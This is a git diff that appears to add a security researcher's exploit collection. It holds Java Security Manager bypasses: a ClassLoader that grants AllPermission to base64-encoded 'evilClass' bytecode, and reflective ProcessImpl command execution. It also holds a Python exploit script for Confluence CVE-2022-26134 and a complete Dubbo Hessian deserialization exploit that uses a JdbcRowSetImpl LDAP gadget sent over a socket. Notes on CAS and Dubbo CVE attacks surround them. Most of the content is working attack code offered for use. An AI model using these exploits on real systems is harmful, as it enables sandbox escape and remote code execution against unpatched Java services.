diff --git a/BypassSM/BypassOfCreateClassLoader.java b/BypassSM/BypassOfCreateClassLoader.java new file mode 100644 index 0000000..21ec80e --- /dev/null +++ b/BypassSM/BypassOfCreateClassLoader.java @@ -0,0 +1,54 @@ +package com.evil; + +import java.security.*; +import java.security.cert.Certificate; + +public class MyPoc { + //-Djava.security.manager -Djava.security.policy==bypass-by-createclassloader.policy + static { + try { + Exp(); + } catch (Exception e) { + e.printStackTrace(); + } + } + + public static void Exp() throws Exception{ + BypassClassLoader0 bypassClassLoader = new BypassClassLoader0(); + Class aClass0 = bypassClassLoader.get(base64Decode("yv66vgAAADQAHwoABgAWBwAXCgACABYKABgAGQcAGgcAGwEADElubmVyQ2xhc3NlcwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQALTGV2aWxDbGFzczsBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABGFyZ3MBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAIPGNsaW5pdD4BAApTb3VyY2VGaWxlAQAOZXZpbENsYXNzLmphdmEMAAgACQEAC2V2aWxDbGFzcyQxBwAcDAAdAB4BAAlldmlsQ2xhc3MBABBqYXZhL2xhbmcvT2JqZWN0AQAeamF2YS9zZWN1cml0eS9BY2Nlc3NDb250cm9sbGVyAQAMZG9Qcml2aWxlZ2VkAQA0KExqYXZhL3NlY3VyaXR5L1ByaXZpbGVnZWRBY3Rpb247KUxqYXZhL2xhbmcvT2JqZWN0OwAhAAUABgAAAAAAAwABAAgACQABAAoAAAAvAAEAAQAAAAUqtwABsQAAAAIACwAAAAYAAQAAAAQADAAAAAwAAQAAAAUADQAOAAAACQAPABAAAQAKAAAAKwAAAAEAAAABsQAAAAIACwAAAAYAAQAAABUADAAAAAwAAQAAAAEAEQASAAAACAATAAkAAQAKAAAAKAACAAAAAAAMuwACWbcAA7gABFexAAAAAQALAAAACgACAAAABgALABEAAgAUAAAAAgAVAAcAAAAKAAEAAgAAAAAACA=="), "evilClass"); + bypassClassLoader.get(base64Decode("yv66vgAAADQALQoACAAcCgAdAB4IAB8KAB0AIAcAIQoABQAiBwAjBwAkBwAlAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAxJbm5lckNsYXNzZXMBAA1MZXZpbENsYXNzJDE7AQADcnVuAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAR2YXIyAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAIQEAClNvdXJjZUZpbGUBAA5ldmlsQ2xhc3MuamF2YQEAD0VuY2xvc2luZ01ldGhvZAcAJgwACgALBwAnDAAoACkBAARjYWxjDAAqACsBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAAsAAsBAAtldmlsQ2xhc3MkMQEAEGphdmEvbGFuZy9PYmplY3QBAB5qYXZhL3NlY3VyaXR5L1ByaXZpbGVnZWRBY3Rpb24BAAlldmlsQ2xhc3MBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAPcHJpbnRTdGFja1RyYWNlADAABwAIAAEACQAAAAIAAAAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAGAA4AAAAMAAEAAAAFAA8AEQAAAAEAEgATAAEADAAAAGoAAgACAAAAErgAAhIDtgAEVwGwTCu2AAYBsAABAAAACgALAAUAAwANAAAAFgAFAAAACQAJAAoACwALAAwADAAQAA0ADgAAABYAAgAMAAYAFAAVAAEAAAASAA8AEQAAABYAAAAGAAFLBwAXAAMAGAAAAAIAGQAaAAAABAAbAAAAEAAAAAoAAQAHAAAAAAAI"), "evilClass$1"); + Class.forName(aClass0.getName(), true, bypassClassLoader); + } + + public static byte[] base64Decode(String bs) throws Exception { + Class base64; + byte[] value = null; + try { + base64 = Class.forName("java.util.Base64"); + Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null); + value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); + } catch (Exception e) { + try { + base64 = Class.forName("sun.misc.BASE64Decoder"); + Object decoder = base64.newInstance(); + value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs}); + } catch (Exception e2) { + } + } + return value; + } + + public static class BypassClassLoader0 extends ClassLoader{ + public Class get(byte[] b,String name) { + PermissionCollection pc = new Permissions(); + pc.add(new AllPermission()); + //设置ProtectionDomain + ProtectionDomain pd = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), pc, this, null); + return super.defineClass(name, b, 0, b.length,pd); + } + } + + public static void main(String[] args) { + + } +} diff --git a/BypassSM/Readme.md b/BypassSM/Readme.md new file mode 100644 index 0000000..b80a9bd --- /dev/null +++ b/BypassSM/Readme.md @@ -0,0 +1,250 @@ +# bypass-sm + +https://www.anquanke.com/post/id/151398 + +https://www.mi1k7ea.com/2020/05/03/%E6%B5%85%E6%9E%90Java%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8/ + +https://github.com/codeplutos/java-security-manager-bypass/ + + + +## **单等号+home目录可写导致Java Security Manager绕过** + +>简单的说就是java程序启动的时候使用 -Djava.security.policy=java.policy 并且home目录可以写,我们就重新写一个policy 文件去提升我们的权限 + +## **通过setSecurityManager绕过Java Security Manager** + +>就是通过反射去修改值达到绕过的目标。 + +其中的该反射可以成功,原因: + +从代码中我们看到,正如前面所说,完成功能的是ProcessImpl.start方法,而在这个方法调用之前,security manager就已经完成了检测,于是,反射这个方法,调用它,就可以绕过检测。 + +[java 命令执行底层](https://blog.csdn.net/qsort_/article/details/104821283) + +```java + public static void executeCommandWithReflection(String command){ + try { + Class clz = Class.forName("java.lang.ProcessImpl"); + Method method = clz.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class); + method.setAccessible(true); + method.invoke(clz,new String[]{command},null,null,null,false); + }catch (Exception e){ + e.printStackTrace(); + } + } +``` + +## **创建类加载器绕过java security manager** + +>自定义一个ClassLoader来加载一个恶意类,并且把它的ProtectionDomain里面的权限初始化成所有权限,这样就能绕过Java Security Manager了 + +[自定义ClassLoader绕过poc为什么很多人执行出现问题的缘由](https://github.com/codeplutos/java-security-manager-bypass/issues/2) + +Exploit.java + +```java +import java.security.AccessController; +import java.security.PrivilegedAction; + +public class Exploit { + public Exploit() { + + } + + static { + AccessController.doPrivileged(new PrivilegedAction() { + public Object run() { + try { + Process process = Runtime.getRuntime().exec("calc"); + return null; + } catch (Exception var2) { + var2.printStackTrace(); + return null; + } + } + }); + } +} +``` + +MyClassLoader.java + +```java +import java.io.ByteArrayOutputStream; +import java.io.File; +import java.io.FileInputStream; +import java.nio.ByteBuffer; +import java.nio.channels.Channels; +import java.nio.channels.FileChannel; +import java.nio.channels.WritableByteChannel; +import java.security.*; +import java.security.cert.Certificate; + +public class MyClassLoader extends ClassLoader { + public MyClassLoader() { + } + + public MyClassLoader(ClassLoader parent) { + super(parent); + } + + @Override + protected Class findClass(String name) throws ClassNotFoundException { + File file = getClassFile(name); + try { + byte[] bytes = getClassBytes(file); + //在这里调用defineClazz,而不是super.defineClass + Class c = defineClazz(name, bytes, 0, bytes.length); + return c; + } catch (Exception e) { + e.printStackTrace(); + } + + return super.findClass(name); + } + + @Override + public Class loadClass(String name) throws ClassNotFoundException { + if (name.contains("Exploit")) { + return findClass(name); + } + return super.loadClass(name); + } + + protected final Class defineClazz(String name, byte[] b, int off, int len) throws ClassFormatError { + try { + PermissionCollection pc = new Permissions(); + pc.add(new AllPermission()); + + //设置ProtectionDomain + ProtectionDomain pd = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), + pc, this, null); + return this.defineClass(name, b, off, len, pd); + } catch (Exception e) { + return null; + } + } + + private File getClassFile(String name) { + File file = new File("./" + name + ".class"); + return file; + } + + private byte[] getClassBytes(File file) throws Exception { + FileInputStream fis = new FileInputStream(file); + FileChannel fc = fis.getChannel(); + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + WritableByteChannel wbc = Channels.newChannel(baos); + ByteBuffer by = ByteBuffer.allocate(1024); + + while (true) { + int i = fc.read(by); + if (i == 0 || i == -1) { + break; + } + + by.flip(); + wbc.write(by); + by.clear(); + } + fis.close(); + return baos.toByteArray(); + } +} +``` + +BypassSandbox .java + +```java +public class BypassSandbox { + public static void main(String[] args) throws Exception { + MyClassLoader mcl = new MyClassLoader(); + Class c1 = Class.forName("Exploit", true, mcl); + Object obj = c1.newInstance(); + System.out.println(obj.getClass().getClassLoader()); + } +} +``` + +## **本地方法调用绕过Java Security Manager** + +>Java Security Manager是在java核心库中的一个功能,而java中native方法是由jvm执行的,不受java security manager管控。因此,我们可以调用java native方法,绕过java security manager。 + +## 附录 + +##### A + +| 权限名 | 用途说明 | +| :-------------------- | :----------------------------------------------------------- | +| accessClassInPackage. | 允许代码访问指定包中的类 | +| accessDeclaredMembers | 允许代码使用反射访问其他类中私有或保护的成员 | +| createClassLoader | 允许代码实例化类加载器 | +| createSecurityManager | 允许代码实例化安全管理器,它将允许程序化的实现对沙箱的控制 | +| defineClassInPackage. | 允许代码在指定包中定义类 | +| exitVM | 允许代码关闭整个虚拟机 | +| getClassLoader | 允许代码访问类加载器以获得某个特定的类 | +| getProtectionDomain | 允许代码访问保护域对象以获得某个特定类 | +| loadlibrary. | 允许代码装载指定类库 | +| modifyThread | 允许代码调整指定的线程参数 | +| modifyThreadGroup | 允许代码调整指定的线程组参数 | +| queuePrintJob | 允许代码初始化一个打印任务 | +| readFileDescriptor | 允许代码读文件描述符(相应的文件是由其他保护域中的代码打开的) | +| setContextClassLoader | 允许代码为某线程设置上下文类加载器 | +| setFactory | 允许代码创建套接字工厂 | +| setIO | 允许代码重定向System.in、System.out或System.err输入输出流 | +| setSecurityManager | 允许代码设置安全管理器 | +| stopThread | 允许代码调用线程类的stop()方法 | +| writeFileDescriptor | 允许代码写文件描述符 | + +##### B + +| 权限名 | 用途说明 | +| :----------------------------- | :---------------------------- | +| accessClipboard | 允许访问系统的全局剪贴板 | +| accessEventQueue | 允许直接访问事件队列 | +| createRobot | 允许代码创建AWT的Robot类 | +| listenToAllAWTEvents | 允许代码直接监听事件分发 | +| readDisplayPixels | 允许AWT Robot读显示屏上的像素 | +| showWindowWithoutWarningBanner | 允许创建无标题栏的窗口 | + +##### C + +| 权限名 | 用途说明 | +| :---------------------------- | :---------------------------- | +| specifyStreamHandler | 允许在URL类中安装新的流处理器 | +| setDefaultAuthenticator | 可以安装鉴别类 | +| requestPassworkAuthentication | 可以完成鉴别 | + +##### D + +| 权限名 | 用途说明 | +| :------------------------- | :--------------------------------------- | +| addIdentityCertificate | 为Identity增加一个证书 | +| clearProviderProperties. | 针对指定的提供者,删除所有属性 | +| createAccessControlContext | 允许创建一个存取控制器的上下文环境 | +| getDomainCombiner | 允许撤销保护域 | +| getPolicy | 检索可以实现沙箱策略的类 | +| getProperty. | 读取指定的安全属性 | +| getSignerPrivateKey | 由Signer对象获取私有密钥 | +| insertProvider. | 将指定的提供者添加到响应的安全提供者组中 | +| loadProviderProperties. | 装载指定的提供者的属性 | +| printIdentity | 打印Identity类内容 | +| putAllProviderProperties. | 更新指定的提供者的属性 | +| putProviderProperty. | 为指定的提供者增加一个属性 | +| removeIdentityCertificate | 取消Identity对象的证书 | +| removeProvider. | 将指定的提供者从相应的安全提供者组中删除 | +| removeProviderProperty. | 删除指定的安全提供者的某个属性 | +| setIdentityInfo | 为某个Identity对象设置信息串 | +| setIdentityPublicKey | 为某个Identity对象设置公钥 | +| setPolicy | 设置可以实现沙箱策略的类 | +| setProperty. | 设置指定的安全属性 | +| setSignerKeyPair | 在Signer对象中设置密钥对 | +| setSystemScope | 设置系统所用的IdentityScope | + +##### E + +| 权限名 | 用途说明 | +| :--------------------------- | :----------------------------------------------------------- | +| enableSubstitution | 允许实现ObjectInputStream类的enableResolveObject()方法和ObjectOutputStream类的enableReplaceObject()方法 | +| enableSubclassImplementation | 允许ObjectInputStream和ObjectOutputStream创建子类,子类可以覆盖readObject()和writeObject()方法 | diff --git a/BypassSM/check.txt b/BypassSM/check.txt new file mode 100644 index 0000000..03400bf --- /dev/null +++ b/BypassSM/check.txt @@ -0,0 +1,31 @@ +checkAccept(String, int) +checkAccess(Thread) +checkAccess(ThreadGroup) +checkAwtEventQueueAccess() +checkConnect(String, int) +checkConnect(String, int, Object) +checkCreateClassLoader() +checkDelete(String) +checkExec(String) +checkExit(int) +checkLink(String) +checkListen(int) +checkMemberAccess(Class, int) +checkMulticast(InetAddress) +checkMulticast(InetAddress, byte) +checkPackageAccess(String) +checkPackageDefinition(String) +checkPermission(Permission) +checkPermission(Permission, Object) +checkPrintJobAccess() +checkPropertiesAccess() +checkPropertyAccess(String) +checkRead(FileDescriptor) +checkRead(String) +checkRead(String, Object) +checkSecurityAccess(String) +checkSetFactory() +checkSystemClipboardAccess() +checkTopLevelWindow(Object) +checkWrite(FileDescriptor) +checkWrite(String) \ No newline at end of file diff --git a/BypassSM/learn/bypass_sm.jar b/BypassSM/learn/bypass_sm.jar new file mode 100644 index 0000000..e2a0c13 Binary files /dev/null and b/BypassSM/learn/bypass_sm.jar differ diff --git a/BypassSM/learn/eviljar/pom.xml b/BypassSM/learn/eviljar/pom.xml new file mode 100644 index 0000000..a3e89f3 --- /dev/null +++ b/BypassSM/learn/eviljar/pom.xml @@ -0,0 +1,37 @@ + + + + learn + org.example + 1.0-SNAPSHOT + + 4.0.0 + + eviljar + + + 8 + 8 + + + + + org.apache.maven.plugins + maven-assembly-plugin + 2.5.5 + + + + ErrorBaseExec + + + + jar-with-dependencies + + + + + + \ No newline at end of file diff --git a/BypassSM/learn/eviljar/src/main/java/bypass_sm.java b/BypassSM/learn/eviljar/src/main/java/bypass_sm.java new file mode 100644 index 0000000..507d440 --- /dev/null +++ b/BypassSM/learn/eviljar/src/main/java/bypass_sm.java @@ -0,0 +1,86 @@ +import java.io.*; +import java.lang.reflect.Method; +import java.util.Map; + +public class bypass_sm +{ + public bypass_sm() { + try { + bypass(new String[]{"ipconfig"}); + } catch (Exception e) { + e.printStackTrace(); + } + } + + public static void bypass(String[] cmd) throws Exception{ + Map envblock=null; + String path=null; + ProcessBuilder.Redirect[] stdHandles=null; + boolean redirectErrorStream=true; + + Class C = Class.forName("java.lang.ProcessImpl"); + Method start = C.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class); + start.setAccessible(true); + Process e = (Process) start.invoke(null, cmd, envblock, path, stdHandles, redirectErrorStream); + + BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(e.getInputStream())); + String line; + while ((line=bufferedReader.readLine())!=null){ + System.out.println(line); + } + bufferedReader.close(); + } + + + public static Process ProcessImpl(String[] cmd)throws Exception{ + Map envblock=null; + String path=null; + ProcessBuilder.Redirect[] stdHandles=null; + boolean redirectErrorStream=true; + + Class C = Class.forName("java.lang.ProcessImpl"); + Method start = C.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class); + start.setAccessible(true); + Process e = (Process) start.invoke(null, cmd, envblock, path, stdHandles, redirectErrorStream); + return e; + } + + + public static byte[] readBytes(InputStream in) + throws IOException + { + BufferedInputStream bufin = new BufferedInputStream(in); + int buffSize = 1024; + ByteArrayOutputStream out = new ByteArrayOutputStream(buffSize); + byte[] temp = new byte[buffSize]; + int size = 0; + while ((size = bufin.read(temp)) != -1) { + out.write(temp, 0, size); + } + bufin.close(); + + byte[] content = out.toByteArray(); + + return content; + } + + public static void do_exec(String[] cmd) + throws Exception + { + Process p = ProcessImpl(cmd); + + byte[] stderr = readBytes(p.getErrorStream()); + byte[] stdout = readBytes(p.getInputStream()); + int exitValue = p.waitFor(); + if (exitValue == 0) { + throw new Exception("-----------------\r\n" + new String(stdout) + "-----------------\r\n"); + } + throw new Exception("-----------------\r\n" + new String(stderr) + "-----------------\r\n"); + } + + public static void main(String[] args) + throws Exception + { + do_exec(new String[]{args[0]}); + } +} diff --git a/BypassSM/learn/eviljar/target/classes/bypass_sm.class b/BypassSM/learn/eviljar/target/classes/bypass_sm.class new file mode 100644 index 0000000..d7fb9d5 Binary files /dev/null and b/BypassSM/learn/eviljar/target/classes/bypass_sm.class differ diff --git a/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT-jar-with-dependencies.jar b/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT-jar-with-dependencies.jar new file mode 100644 index 0000000..e2a0c13 Binary files /dev/null and b/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT-jar-with-dependencies.jar differ diff --git a/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT.jar b/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT.jar new file mode 100644 index 0000000..6a68cbe Binary files /dev/null and b/BypassSM/learn/eviljar/target/eviljar-1.0-SNAPSHOT.jar differ diff --git a/BypassSM/learn/eviljar/target/maven-archiver/pom.properties b/BypassSM/learn/eviljar/target/maven-archiver/pom.properties new file mode 100644 index 0000000..40b1317 --- /dev/null +++ b/BypassSM/learn/eviljar/target/maven-archiver/pom.properties @@ -0,0 +1,5 @@ +#Generated by Maven +#Wed Oct 20 19:27:56 CST 2021 +version=1.0-SNAPSHOT +groupId=org.example +artifactId=eviljar diff --git a/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst b/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst new file mode 100644 index 0000000..a927289 --- /dev/null +++ b/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst @@ -0,0 +1 @@ +bypass_sm.class diff --git a/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst b/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst new file mode 100644 index 0000000..7cc0d83 --- /dev/null +++ b/BypassSM/learn/eviljar/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst @@ -0,0 +1 @@ +E:\javaȫ\bypass-sm\learn\eviljar\src\main\java\ErrorBaseExec.java diff --git a/BypassSM/policy/custom.policy b/BypassSM/policy/custom.policy new file mode 100644 index 0000000..054222f --- /dev/null +++ b/BypassSM/policy/custom.policy @@ -0,0 +1,4 @@ +grant { + permission java.io.FilePermission "D:\\*", "read"; + permission java.net.SocketPermission "www.baidu.com:1-", "connect,resolve"; +}; \ No newline at end of file diff --git a/CAS/Readme.md b/CAS/Readme.md new file mode 100644 index 0000000..dc04122 --- /dev/null +++ b/CAS/Readme.md @@ -0,0 +1,35 @@ +# CAS + +>[单点登录](https://baike.baidu.com/item/%E5%8D%95%E7%82%B9%E7%99%BB%E5%BD%95/4940767) [Spring Web flow 概念简介](https://liushaohuang.cn/2020/01/17/Spring-Web-flow-%E6%A6%82%E5%BF%B5%E7%AE%80%E4%BB%8B/) + +## 4.1.x-4.1.6 +4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。 + +类似于shiro550 + +并且版本存在**Commons-collections4** + +## 4.1.7-4.2.x +这个版本的key默认是随机生成的,需要攻击者提供。 + +https://www.anquanke.com/post/id/198842 + +并且存在c3p0组件 + +## 回显 + +https://www.00theway.org/2020/01/04/apereo-cas-rce/ + +## PaddingOracle + +https://github.com/cL0und/cas4.x-execution-rce/blob/master/cas-padding-oracle.py + +>If the target is cas4.x-cas.4.1.6 and the environment is not hardcoded with a key, you can attack by padding oracle. + +https://lfysec.top/2020/06/01/ApereoCAS-PaddingOracle%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/ + +## xxe +https://lfysec.top/2020/06/01/ApereoCAS-PaddingOracle%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/ + + + diff --git a/Confluence/CVE-2022-26134.py b/Confluence/CVE-2022-26134.py new file mode 100644 index 0000000..4b3ee09 --- /dev/null +++ b/Confluence/CVE-2022-26134.py @@ -0,0 +1,114 @@ +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +import argparse +import re +import requests +import urllib3 + +# https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# 利用脚本 +result = [] # 结果 + + +# 添加 +endpoints = [ +] + + +headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Cookie': 'ADMINCONSOLESESSION=1hDwvQkPnPmLyDpwJvBL1qWTyXLYvQqSlMvJv3h7xyTxz5BJtGm3!1162256454', + 'X-Forwarded-For': '127.0.0.1', + 'X-Client-IP': '127.0.0.1', + 'X-Remote-IP': '127.0.0.1', + 'X-Remote-Addr': '127.0.0.1', + 'X-Originating-IP': '127.0.0.1', +} + +proxy = { + # 'http': '127.0.0.1:8080' +} + + +def check_target_version(host, socket_proxies): + try: + response = requests.get("{}/login.action".format(host),headers=headers, timeout=2, verify=False, proxies=socket_proxies, allow_redirects=False) + if response.status_code == 200: + filter_version = re.findall(".*", response.text) + if (len(filter_version) >= 1): + version = filter_version[0].split("'>")[1].split('Apache Dubbo 是伪装的、轻量级的Java RPC 服务框架。[RPC服务](https://www.zhihu.com/question/25536695) +>[默认反序列化利用之hessian2](https://www.anquanke.com/post/id/197658) + +### CVE-2019-17564 +>spring (spring-web(5.1.9.RELEASE)) 的httpinvoker 可能存在反序列化漏洞 [docs](https://docs.spring.io/spring-framework/docs/5.1.0.RELEASE/spring-framework-reference/integration.html#remoting-httpinvoker) + +http://www.lmxspace.com/2020/02/16/Apache-Dubbo%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2019-17564%EF%BC%89/ + +https://www.mi1k7ea.com/2021/07/03/%E6%B5%85%E6%9E%90Dubbo-HttpInvokerServiceExporter%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2019-17564%EF%BC%89/ + +演示:https://github.com/vulhub/vulhub/blob/master/dubbo/CVE-2019-17564/README.zh-cn.md + +### CVE-2020-1948 +https://www.anquanke.com/post/id/209251 +``` +2.7.0 <= Dubbo Version <= 2.7.6 +2.6.0 <= Dubbo Version <= 2.6.7 +Dubbo 所有 2.5.x 版本(官方团队目前已不支持) +``` + +### CVE-2020-11995 + +CVE-2020-1948的绕过 + +``` +Dubbo 2.7.0 ~ 2.7.8 +Dubbo 2.6.0 ~ 2.6.8 +Dubbo 所有 2.5.x 版本 +``` + +```java +import com.rometools.rome.feed.impl.EqualsBean; +import com.rometools.rome.feed.impl.ToStringBean; +import com.sun.rowset.JdbcRowSetImpl; +import java.io.ByteArrayOutputStream; +import java.io.OutputStream; +import java.lang.reflect.Array; +import java.lang.reflect.Constructor; +import java.net.Socket; +import java.util.HashMap; +import java.util.Random; +import marshalsec.util.Reflections; +import org.apache.dubbo.common.io.Bytes; +import org.apache.dubbo.common.serialize.Cleanable; +import org.apache.dubbo.common.serialize.hessian2.Hessian2ObjectOutput; + +/** + * CVE-2020-1948 exp + * if (!RpcUtils.isGenericCall(path, getMethodName()) && !RpcUtils.isEcho(path, getMethodName())) { + * throw new IllegalArgumentException("Service not found:" + path + ", " + getMethodName()); + * } + * 下面有绕过CVE-2020-11995 + * 调用的函数名为 "$invoke"、 "$invokeAsync"、"$echo"三者之一 + */ +public class GadgetsTestHessian { + + public static void main(String[] args) throws Exception { + JdbcRowSetImpl rs = new JdbcRowSetImpl(); + //todo 此处填写ldap url + rs.setDataSourceName("ldap://127.0.0.1:43658/ExecObject"); + rs.setMatchColumn("foo"); + Reflections.getField(javax.sql.rowset.BaseRowSet.class, "listeners").set(rs, null); + + ToStringBean item = new ToStringBean(JdbcRowSetImpl.class, rs); + EqualsBean root = new EqualsBean(ToStringBean.class, item); + + HashMap s = new HashMap<>(); + Reflections.setFieldValue(s, "size", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.HashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.HashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + nodeCons.setAccessible(true); + + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, root, root, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, root, root, null)); + Reflections.setFieldValue(s, "table", tbl); + + ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); + + // header. + byte[] header = new byte[16]; + // set magic number. + Bytes.short2bytes((short) 0xdabb, header); + // set request and serialization flag. + header[2] = (byte) ((byte) 0x80 | 2); + + // set request id. + Bytes.long2bytes(new Random().nextInt(100000000), header, 4); + + ByteArrayOutputStream hessian2ByteArrayOutputStream = new ByteArrayOutputStream(); + Hessian2ObjectOutput out = new Hessian2ObjectOutput(hessian2ByteArrayOutputStream); + + out.writeUTF("2.0.2"); + //todo 此处填写注册中心获取到的service全限定名、版本号、方法名 + out.writeUTF("com.threedr3am.learn.server.boot.DemoService"); + out.writeUTF("1.0"); + out.writeUTF("$invoke");//CVE-2020-11995 $invoke,$invokeAsync,$echo + //todo 方法描述不需要修改,因为此处需要指定map的payload去触发 + out.writeUTF("Ljava/util/Map;"); + out.writeObject(s); + out.writeObject(new HashMap()); + + out.flushBuffer(); + if (out instanceof Cleanable) { + ((Cleanable) out).cleanup(); + } + + Bytes.int2bytes(hessian2ByteArrayOutputStream.size(), header, 12); + byteArrayOutputStream.write(header); + byteArrayOutputStream.write(hessian2ByteArrayOutputStream.toByteArray()); + + byte[] bytes = byteArrayOutputStream.toByteArray(); + +//todo 此处填写被攻击的dubbo服务提供者地址和端口 + Socket socket = new Socket("127.0.0.1", 12345); + OutputStream outputStream = socket.getOutputStream(); + outputStream.write(bytes); + outputStream.flush(); + outputStream.close(); + } +} +``` +### CVE-2021-25641 +>Dubbo Provider即服务提供方默认使用dubbo协议来进行RPC通信,而dubbo协议默认是使用Hessian2序列化格式进行对象传输的,不过可以通过更改dubbo协议的第三个flag位字节来更改为使用Kryo或FST序列化格式来进行Dubbo Provider反序列化攻击从而绕过针对Hessian2反序列化相关的限制来达到RCE。 + +https://www.mi1k7ea.com/2021/06/30/%E6%B5%85%E6%9E%90Dubbo-KryoFST%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2021-25641%EF%BC%89/ + +``` +CVE-2021-25641 利用版本需要判断 + +一方面dubbo-common必须<=2.7.3版本另一方面fj的版本要<=1.2.49 并且在2.7.4.1的版本中已经更新了fj版本所以不能使用(只是目前) + +``` +~~可以整理一个fastjson利用gadget~~ + +### CVE-2021-30179 + +分析:https://mp.weixin.qq.com/s/vHJpE2fZ8Lne-xFggoQiAg +实验:https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247488856&idx=1&sn=ee37514a5bfbf8c35f4ec661a4c7d45a&chksm=903933a8a74ebabecaf9428995491494f20e5b24a15f8d52e79d3a9dac601620c21d097cdc1f&scene=21#wechat_redirect + +``` +Apache Dubbo 2.7.0 to 2.7.9 +Apache Dubbo 2.6.0 to 2.6.9 +Apache Dubbo all 2.5.x versions (官方已不再提供支持) + +实验:https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247488856&idx=1&sn=ee37514a5bfbf8c35f4ec661a4c7d45a&chksm=903933a8a74ebabecaf9428995491494f20e5b24a15f8d52e79d3a9dac601620c21d097cdc1f&scene=21#wechat_redirect + +``` +exp:https://github.com/lz2y/DubboPOC +``` +Apache Dubbo默认支持泛化引用由服务端API接口暴露的所有方法,这些调用由GenericFilter处理。GenericFilter将根据客户端提供的接口名、方法名、方法参数类型列表,根据反射机制获取对应的方法,再根据客户端提供的反序列化方式将参数进行反序列化成pojo对象。 + +也就是说需要知道注册中心注册的接口名,方法名,才可以配合攻击。 +``` +也就是需要存在无授权服务注册中心比如zookeeper的无授权去获得接口名和方法名。使用工具**zookeeper-dev-ZooInspector.jar** + +**个人认为CVE-2021-30179的主要思路就是Apache Dubbo在处理泛类引用时,提供了多种通过反序列化方式得到对象再生成pojo对象的选择。** 三梦师傅说跟这个思路扩大了反序列化挖掘思路 + +### CVE-2021-30181 + +https://articles.zsxq.com/id_28iczv3uhbtk.html + +```exp 